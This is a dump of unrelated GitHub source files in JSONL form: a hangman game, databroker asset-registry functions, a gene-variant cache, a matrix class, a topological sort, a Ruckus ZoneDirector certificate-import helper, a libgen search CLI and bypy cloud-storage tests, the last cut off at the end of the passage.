set(string.ascii_uppercase)\n lives = 6\n\n while len(letters_to_guess) > 0 and lives > 0:\n print(\"Letters used: \", \" \".join(letters_guessed))\n current_word = [letter if letter in letters_guessed else '_' for letter in word]\n print(f\"Current Lives: {lives}, Current word: \", \" \".join(current_word))\n letter = input(\"Guess the word: \").upper()\n if letter in validator - letters_guessed:\n if letter in letters_to_guess:\n letters_guessed.add(letter)\n letters_to_guess.remove(letter)\n\n else:\n # wrong word or word already in guessed word list\n letters_guessed.add(letter)\n lives -= 1\n\n elif letter in letters_guessed:\n print(\"You have already guessed the letter.\")\n else:\n print(\"Invalid letter entered.\")\n\n if lives == 0:\n print(f\"You lost, the word was {word}\")\n else:\n print(\"Congratulations You won!!!\")\n\n\nhangman()","repo_name":"azizmalik787/pythonProjects","sub_path":"hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6747793190","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport six\nfrom jsonschema import validate as js_validate\nimport warnings\nimport uuid\nimport time as ttime\nimport pandas as pd\nfrom ..utils import sanitize_np, apply_to_dict_recursively\n\n\nclass DatumNotFound(Exception):\n \"\"\"\n Raised if a Datum id is not found.\n 
\"\"\"\n def __init__(self, datum_id, msg=None, *args):\n if msg is None:\n msg = f\"No datum found with datum id {datum_id}\"\n super().__init__(msg, *args)\n self.datum_id = datum_id\n\n\nclass EventDatumNotFound(Exception):\n \"\"\"\n Raised if an Event document is found to have an unknown Datum id.\n \"\"\"\n def __init__(self, event_uid, datum_id, msg=None, *args):\n if msg is None:\n msg = (\n f\"Event with uid {event_uid} references \"\n f\"unknown Datum with datum id {datum_id}\"\n )\n super().__init__(msg, *args)\n self.event_uid = event_uid\n self.datum_id = datum_id\n\n\ndef doc_or_uid_to_uid(doc_or_uid):\n \"\"\"Given Document or uid return the uid\n\n Parameters\n ----------\n doc_or_uid : dict or str\n If str, then assume uid and pass through, if not, return\n the 'uid' field\n\n Returns\n -------\n uid : str\n A string version of the uid of the given document\n\n \"\"\"\n if not isinstance(doc_or_uid, six.string_types):\n doc_or_uid = doc_or_uid['uid']\n return doc_or_uid\n\n\ndef _get_datum_from_datum_id(col, datum_id, datum_cache, logger):\n try:\n datum = datum_cache[datum_id]\n except KeyError:\n # find the current document\n edoc = col.find_one({'datum_id': datum_id})\n if edoc is None:\n raise DatumNotFound(datum_id=datum_id)\n # save it for later\n datum = dict(edoc)\n\n res = edoc['resource']\n count = 0\n for dd in col.find({'resource': res}):\n count += 1\n d_id = dd['datum_id']\n if d_id not in datum_cache:\n datum_cache[d_id] = dict(dd)\n if count > datum_cache.max_size:\n logger.warn(\"More datum in a resource than your \"\n \"datum cache can hold.\")\n\n datum.pop('_id', None)\n return datum\n\n\ndef retrieve(col, datum_id, datum_cache, get_spec_handler, logger):\n datum = _get_datum_from_datum_id(col, datum_id, datum_cache, logger)\n handler = get_spec_handler(datum['resource'])\n return handler(**datum['datum_kwargs'])\n\n\ndef resource_given_datum_id(col, datum_id, datum_cache, logger):\n datum_id = doc_or_uid_to_uid(datum_id)\n datum = _get_datum_from_datum_id(col, datum_id, datum_cache, logger)\n res = datum['resource']\n return res\n\n\ndef resource_given_uid(col, resource):\n uid = doc_or_uid_to_uid(resource)\n ret = col.find_one({'uid': uid})\n ret.pop('_id', None)\n ret['id'] = ret['uid']\n return ret\n\n\ndef bulk_insert_datum(col, resource, datum_ids,\n datum_kwarg_list):\n\n resource_id = doc_or_uid_to_uid(resource)\n\n def datum_factory():\n for d_id, d_kwargs in zip(datum_ids, datum_kwarg_list):\n datum = dict(resource=resource_id,\n datum_id=str(d_id),\n datum_kwargs=dict(d_kwargs))\n apply_to_dict_recursively(datum, sanitize_np)\n yield datum\n\n col.insert_many(datum_factory())\n\n\ndef bulk_register_datum_table(datum_col,\n resource_uid,\n dkwargs_table,\n validate):\n if validate:\n raise\n\n d_ids = [str(uuid.uuid4()) for j in range(len(dkwargs_table))]\n dkwargs_table = pd.DataFrame(dkwargs_table)\n bulk_insert_datum(datum_col, resource_uid, d_ids, [\n dict(r) for _, r in dkwargs_table.iterrows()])\n return d_ids\n\n\ndef register_datum(col, resource_uid, datum_kwargs):\n datum_uid = str(uuid.uuid4())\n datum = insert_datum(col, resource_uid, datum_uid, datum_kwargs, {}, None)\n return datum['datum_id']\n\n\ndef insert_datum(col, resource, datum_id, datum_kwargs, known_spec,\n resource_col, ignore_duplicate_error=False,\n duplicate_exc=None):\n if ignore_duplicate_error:\n assert duplicate_exc is not None\n\n if duplicate_exc is None:\n class _PrivateException(Exception):\n pass\n duplicate_exc = _PrivateException\n try:\n 
resource['spec']\n spec = resource['spec']\n\n if spec in known_spec:\n js_validate(datum_kwargs, known_spec[spec]['datum'])\n except (AttributeError, TypeError):\n pass\n\n resource_uid = doc_or_uid_to_uid(resource)\n\n datum = dict(resource=resource_uid,\n datum_id=str(datum_id),\n datum_kwargs=dict(datum_kwargs))\n apply_to_dict_recursively(datum, sanitize_np)\n # We are transitioning from ophyd objects inserting directly into a\n # Registry to ophyd objects passing documents to the RunEngine which in\n # turn inserts them into a Registry. During the transition period, we allow\n # an ophyd object to attempt BOTH so that configuration files are\n # compatible with both the new model and the old model. Thus, we need to\n # ignore the second attempt to insert.\n try:\n col.insert_one(datum)\n except duplicate_exc:\n if ignore_duplicate_error:\n warnings.warn(\"Ignoring attempt to insert Resource with duplicate \"\n \"uid, assuming that both ophyd and bluesky \"\n \"attempted to insert this document. Remove the \"\n \"Registry (`reg` parameter) from your ophyd \"\n \"instance to remove this warning.\")\n else:\n raise\n # do not leak mongo objectID\n datum.pop('_id', None)\n\n return datum\n\n\ndef insert_resource(col, spec, resource_path, resource_kwargs,\n known_spec, root, path_semantics='posix', uid=None,\n run_start=None, id=None,\n ignore_duplicate_error=False, duplicate_exc=None):\n \"\"\"Insert resource into a databroker.\n\n Parameters\n ----------\n col : pymongo.Collection instance\n Collection to insert data into\n spec : str\n The resource data spec\n resource_path : str\n The path to the resource files\n resource_kwargs : dict\n The kwargs for the resource\n known_spec : set\n The known specs\n root : str\n The root of the file path\n path_semantics : str, optional\n The name of the path semantics, e.g. ``posix`` for Linux systems\n uid : str, optional\n The unique ID for the resource\n run_start : str, optional\n The unique ID for the start document the resource is associated with\n id : str, optional\n Dummy variable so that we round trip resources, same as ``uid``\n\n Returns\n -------\n resource_object : dict\n The resource\n \"\"\"\n if ignore_duplicate_error:\n assert duplicate_exc is not None\n if duplicate_exc is None:\n class _PrivateException(Exception):\n pass\n duplicate_exc = _PrivateException\n resource_kwargs = dict(resource_kwargs)\n if spec in known_spec:\n js_validate(resource_kwargs, known_spec[spec]['resource'])\n if uid is None:\n uid = str(uuid.uuid4())\n\n resource_object = dict(spec=str(spec),\n resource_path=str(resource_path),\n root=str(root),\n resource_kwargs=resource_kwargs,\n path_semantics=path_semantics,\n uid=uid)\n # This is special-cased because it was added later.\n # Someday this may be required and no longer special-cased.\n if run_start is not None:\n resource_object['run_start'] = run_start\n # We are transitioning from ophyd objects inserting directly into a\n # Registry to ophyd objects passing documents to the RunEngine which in\n # turn inserts them into a Registry. During the transition period, we allow\n # an ophyd object to attempt BOTH so that configuration files are\n # compatible with both the new model and the old model. 
Thus, we need to\n # ignore the second attempt to insert.\n try:\n col.insert_one(resource_object)\n except duplicate_exc:\n if ignore_duplicate_error:\n warnings.warn(\"Ignoring attempt to insert Datum with duplicate \"\n \"datum_id, assuming that both ophyd and bluesky \"\n \"attempted to insert this document. Remove the \"\n \"Registry (`reg` parameter) from your ophyd \"\n \"instance to remove this warning.\")\n else:\n raise\n resource_object['id'] = resource_object['uid']\n resource_object.pop('_id', None)\n return resource_object\n\n\ndef update_resource(update_col, resource_col, old, new, cmd, cmd_kwargs):\n '''Update a resource document\n\n Parameters\n ----------\n update_col : Collection\n The collection to record audit trail in\n resource_col : Collection\n The resource collection\n\n old : dict\n The old resource document\n\n new : dict\n The new resource document\n\n cmd : str\n The name of the operation which generated this update\n\n cmd_kwargs : dict\n The arguments that went into the update (excluding the resource id)\n\n\n Returns\n -------\n ret : dict\n The new resource document\n\n log_object : dict\n The history object inserted (with oid removed)\n '''\n if old['uid'] != new['uid']:\n raise RuntimeError('must not change the resource uid')\n uid = old['uid']\n log_object = {'resource': uid,\n 'old': old,\n 'new': new,\n 'time': ttime.time(),\n 'cmd': cmd,\n 'cmd_kwargs': cmd_kwargs}\n\n update_col.insert_one(log_object)\n result = resource_col.replace_one({'uid': uid}, new)\n ret = resource_given_uid(resource_col, uid)\n # TODO look inside of result\n del result\n log_object.pop('_id', None)\n return ret, log_object\n\n\ndef get_resource_history(col, resource):\n uid = doc_or_uid_to_uid(resource)\n cursor = col.find({'resource': uid})\n for doc in cursor:\n for k in ['new', 'old']:\n d = doc[k]\n d.pop('_id', None)\n d['id'] = d['uid']\n doc[k] = d\n doc.pop('_id', None)\n yield doc\n\n\ndef get_datumkw_by_resuid_gen(datum_col, resource_uid):\n '''Given a resource uid, get all datum_kwargs\n\n No order is guaranteed.\n\n Internally the result of this is passed to the `get_file_list` method\n of the handler object in `change_root`\n\n Parameters\n ----------\n datum_col : Collection\n The Datum collection\n\n resource_uid : dict or str\n The resource to work on\n\n Yields\n ------\n datum_kwarg : dict\n '''\n resource_uid = doc_or_uid_to_uid(resource_uid)\n cur = datum_col.find({'resource': resource_uid})\n\n for d in cur:\n yield d['datum_kwargs']\n\n\ndef get_datum_by_res_gen(datum_col, resource_uid):\n '''Given a resource uid, get all datums\n\n No order is guaranteed.\n\n Internally the result of this is passed to the `get_file_list` method\n of the handler object in `change_root`\n\n Parameters\n ----------\n datum_col : Collection\n The Datum collection\n\n resource_uid : dict or str\n The resource to work on\n\n Yields\n ------\n datum : dict\n '''\n resource_uid = doc_or_uid_to_uid(resource_uid)\n cur = datum_col.find({'resource': resource_uid})\n\n for d in cur:\n yield d\n\n\ndef get_file_list(resource, datum_kwarg_gen, get_spec_handler):\n \"\"\"\n Given a resource and an iterable of datum kwargs, get a list of\n associated files.\n\n DO NOT USE FOR COPYING OR MOVING. 
This is for debugging only.\n See the methods for moving and copying on the Registry object.\n \"\"\"\n handler = get_spec_handler(resource['uid'])\n return handler.get_file_list(datum_kwarg_gen)\n","repo_name":"bluesky/databroker","sub_path":"databroker/assets/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"13275713028","text":"\"\"\"\nThis script will run once when the serve runs.\nIt uses the csv module to go through all the rows.\nFor every single row, it will ignore the rows that do not have either gene or nucleotide_change listed.\nFor the rows that have both of them listed, it will check if the key (gene) exists in the cache.\n\tIf the key (gene) exists in the cache, the details will be appended to the values of the key.\n\tIf the key (gene) does not exist in the cache, a new key, value pair will be created in the cache.\n\"\"\"\n\nimport csv\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nGENE_CACHE = {}\n\n\ndef create_cache():\n print(\"Ran once!\")\n with open(f'{BASE_DIR}/data/variants.tsv', 'r', encoding=None) as tsvin:\n tsvin = csv.reader(tsvin, delimiter='\\t')\n for row in tsvin:\n current = {\n 'gene': row[0],\n 'nucleotide_change': row[1],\n 'protein_change': row[2],\n 'other_mappings': row[3],\n 'alias': row[4],\n 'transcripts': row[5],\n 'region': row[6],\n 'reported_classification': row[7],\n 'inferred_classification': row[8],\n 'source': row[9],\n 'last_evaluated': row[10],\n 'last_updated': row[11],\n 'url': row[12],\n 'submitter_comment': row[13]\n # 'assembly': row[14],\n # 'chr': row[15],\n # 'genomic_start': row[16],\n # 'genomic_stop': row[17],\n # 'ref': row[18],\n # 'alt': row[19],\n # 'accession': row[20],\n # 'reported_ref': row[21],\n # 'reported_alt': row[22]\n }\n if row[0] != \"\" and row[1] != \"\" and row[0] not in GENE_CACHE:\n GENE_CACHE[row[0]] = [current]\n elif row[0] != \"\" and row[1] != \"\":\n GENE_CACHE[row[0]].append(current)\n return GENE_CACHE\n","repo_name":"rja907/g-v","sub_path":"src/api/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9577788856","text":"class MatrixAdditionError(Exception):\n pass\n\n\nclass Matrix:\n def __init__(self, elements=None):\n self.elements = elements if elements else []\n self.rows = len(self.elements)\n self.columns = len(self.elements[0]) if elements else 0\n self.dimension = (self.rows, self.columns)\n\n def __str__(self):\n return '\\n'.join(' '.join(str(element) for element in row) for row in self.elements)\n\n def __add__(self, other):\n if self.dimension != other.dimension:\n raise MatrixAdditionError('Dimensions of matrices must be the same')\n\n new_matrix = [\n [element_1 + element_2 for element_1, element_2 in zip(row_1, row_2)]\n for row_1, row_2 in zip(self.elements, other.elements)\n ]\n\n return Matrix(new_matrix)\n\n\na = Matrix([[1, 2, 3], [4, 5, 6]])\nb = Matrix([[10, 32.3, 4], [-10, 0, 54.9]])\nc = Matrix([[1, 2], [3, 4]])\nprint(a + b)\nprint(type(a + b))\nprint(a + c)\n\n# output example\n\n# 11 34.3 7\n# -6 5 60.9\n# \n# Traceback (most recent call last):\n# File \"D:/VSCodeFiles/de_python_course/Kulushev_Konstantin_dz_10_task_1.py\", line 32, in \n# print(a + c)\n# File \"D:/VSCodeFiles/de_python_course/Kulushev_Konstantin_dz_10_task_1.py\", line 17, in __add__\n# raise 
MatrixAdditionError('Dimensions of matrices must be the same')\n# __main__.MatrixAdditionError: Dimensions of matrices must be the same\n","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_10/Kulushev_Konstantin_dz_10_task_1.py","file_name":"Kulushev_Konstantin_dz_10_task_1.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30149109251","text":"# 위상정렬 구현하기\nfrom collections import deque\n\n# 노드와 간선 입력받기\nv, e = map(int, input().split())\n\n# 진입차수 리스트 선언\nindegree = [0] * (v+1)\n\n# 그래프 입력받기\ngraph = [ [] for i in range(v+1)]\nfor _ in range(e):\n a,b = map(int, input().split())\n graph[a].append(b)\n indegree[b] += 1\n# print( graph[1:] )\n# print( indegree[1:] )\n\n# deque선언\nq = deque()\nfor i in range(1, v+1):\n if indegree[i] == 0:\n q.append(i)\n\n#위상정렬 솔루션\ndef solution():\n while q:\n # q 가장 왼쪽값 pop\n now = q.popleft()\n print ( now )\n # now노드에 연결된 간선 제거\n for i in graph[now]:\n indegree[i] -= 1\n\n if indegree[i] == 0:\n q.append(i)\n\nsolution()","repo_name":"Imseungbae/algorithm","sub_path":"topological_sort.py","file_name":"topological_sort.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42868010352","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120902\n\ndef solution(my_string):\n answer = 0\n op = 1\n for i,s in enumerate(my_string.split(' ')):\n if i % 2 == 0:\n answer += int(s) * op\n else:\n op = 1 if s == '+' else -1\n return answer\n","repo_name":"yongsun-yoon/python-algorithms","sub_path":"programmers/120902.py","file_name":"120902.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25580103898","text":"\n'''\nimport CA to ZD\nCreated on Nov 12, 2014\n@author: Yu.yanan@odc-ruckuswireless.com\n'''\n\nimport logging\nimport time\nimport os\n\nfrom RuckusAutoTest.components.lib.zd import control_zd as control_zd\nfrom RuckusAutoTest.common.utils import list_to_dict\nfrom RuckusAutoTest.components.lib.zd import widgets_zd as wgt\nfrom RuckusAutoTest.components.lib.zd import aps\n\nlocators = dict(\n advanced_options_anchor = r\"//tr[@id='advance']//a[@href='#']\",\n cover_ca_radio = r\"//input[@id='cover_CA']\",\n loc_brower_select_ca = r\"//input[@id='filename-uploadCA']\",\n loc_ca_upload_button = r\"//input[@id='perform-uploadCA']\",\n loc_admin_ca_upload_error_span = r\"//span[@id='error-uploadCA']\",\n\n)\ndef _nav_to(zd):\n return zd.navigate_to(zd.CONFIGURE, zd.CONFIGURE_CERTIFICATE)\n\n\ndef _import_ca(zd,ca_path):\n _nav_to(zd)\n \n if os.path.exists(ca_path):\n logging.info('The ca file exists')\n else:\n raise Exception(\"The CA do not exists.please check it.\")\n\n zd.s.click_and_wait(locators['advanced_options_anchor'])\n zd.s.click_and_wait(locators['cover_ca_radio'])\n \n browser_ca_field = locators['loc_brower_select_ca']\n if not zd.s.is_element_present(browser_ca_field):\n raise Exception(\"The field to select ca file is not present\")\n try:\n zd.s.type(browser_ca_field,ca_path)\n except:\n raise Exception(\"Can not set value %s to the locator %s\" % (ca_path, browser_ca_field))\n \n upload_ca_button = locators['loc_ca_upload_button']\n \n if not zd.s.is_element_present(upload_ca_button):\n raise Exception(\"The button to upload ca file is not present\")\n zd.s.click_and_wait(upload_ca_button)\n 
logging.info('click upload ca button.')\n \n if zd.s.is_confirmation_present(5):\n cfm=zd.s.get_confirmation()\n logging.info(\"There's a confirmation:\\n%s\"%cfm)\n logging.info('Clicked OK')\n if zd.s.is_element_visible(locators['loc_admin_ca_upload_error_span']):\n msg = zd.s.get_text(locators['loc_admin_ca_upload_error_span'])\n if not msg.find('successful'):\n raise Exception(msg)\n \n \n \n\n ","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/components/lib/zd/config_certificate.py","file_name":"config_certificate.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37531303305","text":"#!/usr/bin/env python3\n# command-line utility to search libgen api for title and author\nimport argparse\nimport json\nfrom libgen_api import LibgenSearch\n\nparser = argparse.ArgumentParser(\n description=\"Command-line utility to parse libgen API search results for author and/or title.\")\nparser.add_argument(\"--title\", type=str,\n help=\"The title of what you would like to search.\")\nparser.add_argument(\"--author\", type=str,\n help=\"The author of the work you would like to search.\")\n\nargs = parser.parse_args()\n\ns = LibgenSearch()\n\ndef format_result(header_line, result, result_count):\n line_seperator = \"------------\" * 6\n download_links = s.resolve_download_links(result)\n\n print(header_line)\n print(\"Result count: {}\".format(result_count))\n print(line_seperator)\n print(json.dumps(result, indent=2))\n print(line_seperator)\n print(\"Download links:\")\n print(json.dumps(download_links, indent=2))\n print(line_seperator)\n\n\ndef search_title(title):\n results = s.search_title(title)\n result_count = 0\n for result in results:\n result_count += 1\n header_line = \"Title Search {}\".format(title)\n\n format_result(header_line, result, result_count)\n\n\ndef search_author(author):\n results = s.search_author(author)\n result_count = 0\n for result in results:\n result_count += 1\n header_line = \"Author Search: {}\".format(author)\n\n format_result(header_line, result, result_count)\n\n\nif args.title:\n search_title(args.title)\nelif args.author:\n search_author(args.author)\nelse:\n print(\"Please provide a title or author.\")\n exit\n","repo_name":"JSriwongsa/libgen_tools","sub_path":"libgen_searcher.py","file_name":"libgen_searcher.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19912621072","text":"l_t = ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n\ni = 0\n\nfor i in l_t:\n if i.isdigit():\n l_t.extend(['\"', f'{i.zfill(2)}', '\"'])\n elif i.startswith('+'):\n l_t.extend(['\"', f'{i.zfill(3)}', '\"'])\n\n else:\n l_t.append(i)\n\n print(l_t)\n\n# while n < len(l_t):\n# if l_t[i].isdigit():\n# l_t[i] = l_t[i].zfill(2)\n# elif l_t[i].startswith('+'):\n# l_t[i] = l_t[i].zfill(3)\n# i += 1\n# n = 1\n# while n < len(l_t):\n# if l_t[n].isdigit():\n# l_t.insert(n, '\"')\n# l_t.insert(n + 2, '\"')\n# n +=2\n#\n# print(l_t)","repo_name":"Amor2302/lesson_3","sub_path":"lesson_2/копия.py","file_name":"копия.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29675741945","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# primitive sanity tests\n\nfrom __future__ import unicode_literals\n\nimport os\nimport 
sys\nimport shutil\nimport re\nimport pprint\nimport copy\nimport time\nif sys.version_info[0] == 3:\n\tbasestring = str\n\nTestGarbledPathNames = False\n\n# store the output, for further analysis\nclass StorePrinter(object):\n\tdef __init__(self, opr):\n\t\tself.opr = opr\n\t\tself.q = []\n\n\tdef pr(self, msg):\n\t\tself.q.append(msg)\n\t\tself.opr(msg)\n\n\tdef empty(self):\n\t\tdel self.q[:]\n\n\tdef getq(self):\n\t\treturn self.q\n\ndef banner(msg):\n\ttitle = \"{0} {1} {0}\".format('=' * 8, msg)\n\tline = '=' * len(title)\n\tprint(line)\n\tprint(title)\n\tprint(line)\n\ndef ifany(list, require):\n\tfor element in list:\n\t\tif require(element):\n\t\t\treturn True\n\n\treturn False\n\ndef filterregex(list, regex):\n\trec = re.compile(regex)\n\treturn filter(lambda x: rec and isinstance(x, basestring) and rec.search(x), list)\n\ndef makesuredir(dirname):\n\tif not os.path.exists(dirname):\n\t\tos.mkdir(dirname)\n\n# TODO: this is a quick hack, need to re-structure the directory later\n# http://stackoverflow.com/questions/11536764/attempted-relative-import-in-non-package-even-with-init-py/27876800#27876800\nbypydir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n#sys.path.insert(0, bypydir)\nsys.path.append(bypydir)\n#print(sys.path)\nconfigdir = 'configdir'\ndownloaddir = 'downdir'\ntestdir = 'testdir'\nsharedir = 'sharedir'\nimport bypy\n# monkey patch all the way\nmpr = StorePrinter(bypy.pr)\nbypy.pr = mpr.pr\n# create some dummy files\nzerofilename = os.path.join(testdir, 'allzero.1m.bin')\nmakesuredir(configdir)\nshutil.copy('bypy.json', configdir)\nshutil.copy('bypy.setting.json', configdir)\nby = bypy.ByPy(configdir=configdir, debug=1, verbose=1)\n\ndef testmergeinto():\n\tfromc = {\n\t\t'a': {\n\t\t\t'a1': 1,\n\t\t\t'a2': 2\n\t\t},\n\t\t'b': {\n\t\t\t'b1': 10,\n\t\t\t'b2': 20\n\t\t}\n\t}\n\n\tto = {\n\t\t'a': {\n\t\t\t'a1': 9,\n\t\t\t'a3': 3\n\t\t},\n\t\t'b': {\n\t\t\t'b2': 90,\n\t\t\t'b3': 30,\n\t\t},\n\t\t'c': {\n\t\t\t'c1': 100\n\t\t}\n\t}\n\ttoorig = copy.deepcopy(to)\n\n\tpprint.pprint(fromc)\n\tpprint.pprint(to)\n\tbypy.cached.mergeinto(fromc, to)\n\tpprint.pprint(to)\n\tprint(repr(to))\n\tassert to == {u'a': {u'a1': 9, u'a3': 3, u'a2': 2}, u'c': {u'c1': 100}, u'b': {u'b1': 10, u'b2': 90, u'b3': 30}}\n\n\tto = toorig\n\tpprint.pprint(fromc)\n\tpprint.pprint(to)\n\tbypy.cached.mergeinto(fromc, to, False)\n\tpprint.pprint(to)\n\tprint(repr(to))\n\tassert to == {u'a': {u'a1': 1, u'a3': 3, u'a2': 2}, u'c': {u'c1': 100}, u'b': {u'b1': 10, u'b2': 20, u'b3': 30}}\n\ndef createdummyfile(filename, size, value = 0):\n\twith open(filename, 'wb') as f:\n\t\tba = bytearray([value] * size)\n\t\tf.write(ba)\n\ndef prepare():\n\t# preparation\n\tif 'refresh' in sys.argv:\n\t\tby.refreshtoken()\n\t# we must upload something first, otherwise, listing / deleting the root directory will fail\n\tbanner(\"Uploading a file\")\n\tassert by.upload(testdir + '/a.txt') == bypy.ENoError\n\tprint(\"Response: {}\".format(by.response.json()))\n\tbanner(\"Listing the root directory\")\n\tassert by.list('/') == bypy.ENoError\n\tprint(\"Response: {}\".format(by.response.json()))\n\tmpr.empty()\n\tcreatedummyfile(zerofilename, 1024 * 1024)\n\n\tmakesuredir(sharedir)\n\tsharesubdir = sharedir + '/subdir'\n\tmakesuredir(sharesubdir)\n\tcreatedummyfile(sharedir + '/1M0.bin', 1024 * 1024)\n\tcreatedummyfile(sharedir + '/1M1.bin', 1024 * 1024, 1)\n\tcreatedummyfile(sharesubdir + '/1M2.bin', 1024 * 1024, 2)\n\n\tif TestGarbledPathNames:\n\t\tjd = testdir.encode() + os.sep.encode() + 
b'garble\\xec\\xeddir'\n\t\tjf = testdir.encode() + os.sep.encode() + b'garble\\xea\\xebfile'\n\t\tmakesuredir(jd)\n\t\twith open(jf, 'w') as f:\n\t\t\tf.write(\"garbled\")\n\ndef emptyremote():\n\tbanner(\"Deleting all the files at PCS\")\n\tassert by.delete('/') == bypy.ENoError\n\tassert 'request_id' in by.response.json()\n\tmpr.empty()\n\ndef uploaddir():\n\t# upload\n\tbanner(\"Uploading the local directory\")\n\tassert by.upload(testdir, testdir) == bypy.ENoError\n\tassert filterregex(mpr.getq(),\n\t\t\t\t\t r\"RapidUpload: 'testdir[\\\\/]allzero.1m.bin' =R=\\> '/apps/bypy/testdir/allzero.1m.bin' OK\")\n\tassert filterregex(mpr.getq(), r\"'testdir[\\\\/]a.txt' ==> '/apps/bypy/testdir/a.txt' OK.\")\n\tassert filterregex(mpr.getq(), r\"'testdir[\\\\/]b.txt' ==> '/apps/bypy/testdir/b.txt' OK.\")\n\tprint(\"Response: {}\".format(by.response.json()))\n\tmpr.empty()\n\ndef getquota():\n\t# quota\n\tbanner(\"Getting quota\")\n\tassert by.info() == bypy.ENoError\n\tresp = by.response.json()\n\tprint(\"Response: {}\".format(resp))\n\t#assert resp['used'] == 1048626\n\tassert resp['quota'] == 2206539448320\n\tmpr.empty()\n\ndef assertsame():\n\tbypy.pr(by.result)\n\tassert len(by.result['diff']) == 0\n\tassert len(by.result['local']) == 0\n\tassert len(by.result['remote']) == 0\n\tassert len(by.result['same']) >= 5\n\ndef compare():\n\t# comparison\n\tbanner(\"Comparing\")\n\tassert by.compare(testdir, testdir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef downdir():\n\t# download\n\tbanner(\"Downloading dir\")\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassert by.downdir(testdir, downloaddir) == bypy.ENoError\n\tassert by.download(testdir, downloaddir) == bypy.ENoError\n\tassert by.compare(testdir, downloaddir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef syncup():\n\tbanner(\"Syncing up\")\n\temptyremote()\n\tassert by.syncup(testdir, testdir) == bypy.ENoError\n\tassert by.compare(testdir, testdir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef syncdown():\n\tbanner(\"Syncing down\")\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassert by.syncdown(testdir, downloaddir) == bypy.ENoError\n\tassert by.compare(testdir, downloaddir) == bypy.ENoError\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassertsame()\n\tmpr.empty()\n\ndef cdl():\n\tbanner(\"Offline (cloud) download\")\n\tresult = by.cdl_cancel(123)\n\tassert int(result) == 36016\n\tmpr.empty()\n\tassert by.cdl_list() == bypy.ENoError\n\t# {u'request_id': 353951550, u'task_info': [], u'total': 0}\n\tassert filterregex(mpr.getq(), r\"'total'\\s*:\\s*0\")\n\tmpr.empty()\n\tassert by.cdl_query(123) == bypy.ENoError\n\tassert filterregex(mpr.getq(), r\"'result'\\s*:\\s*1\")\n\tmpr.empty()\n\tassert by.cdl_add(\"http://dl.client.baidu.com/BaiduKuaijie/BaiduKuaijie_Setup.exe\", testdir) == bypy.ENoError\n\tassert filterregex(mpr.getq(), r\"'task_id'\\s*:\\s*\\d+\")\n\tassert by.cdl_addmon(\"http://dl.client.baidu.com/BaiduKuaijie/BaiduKuaijie_Setup.exe\", testdir) == bypy.ENoError\n\tmpr.empty()\n\ndef testshare():\n\tbanner(\"Share\")\n\t#assert bypy.ENoError == by.share(sharedir, '/', True, True)\n\tassert bypy.ENoError == by.share(sharedir, sharedir)\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M0.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M1.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/subdir/1M2.bin\".format(sharedir))\n\tmpr.empty()\n\tassert bypy.ENoError == by.upload(sharedir, sharedir)\n\tassert bypy.ENoError == 
by.share(sharedir, sharedir, False)\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M0.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M1.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/subdir/1M2.bin\".format(sharedir))\n\tmpr.empty()\n\ndef main():\n\ttestmergeinto()\n\tprepare()\n\ttime.sleep(2)\n\ttestshare()\n\ttime.sleep(2)\n\t# sleep sometime helps preventing hanging requests \n\tcdl()\n\ttime.sleep(2)\n\temptyremote()\n\ttime.sleep(2)\n\ttime.sleep(2)\n\tuploaddir()\n\ttime.sleep(2)\n\tgetquota()\n\ttime.sleep(2)\n\tcompare()\n\ttime.sleep(2)\n\tdowndir()\n\ttime.sleep(2)\n\tsyncup()\n\ttime.sleep(2)\n\tsyncdown()\n\n\t# test aria2 downloading\n\tglobal by\n\tby = bypy.ByPy(configdir=configdir, downloader='aria2', debug=1, verbose=1)\n\tdowndir()\n\n\t# clean up\n\tos.remove(zerofilename)\n\tshutil.rmtree(configdir, ignore_errors=True)\n\tshutil.rmtree(sharedir, ignore_errors=True)\n\tshutil.rmtree(downloaddir, 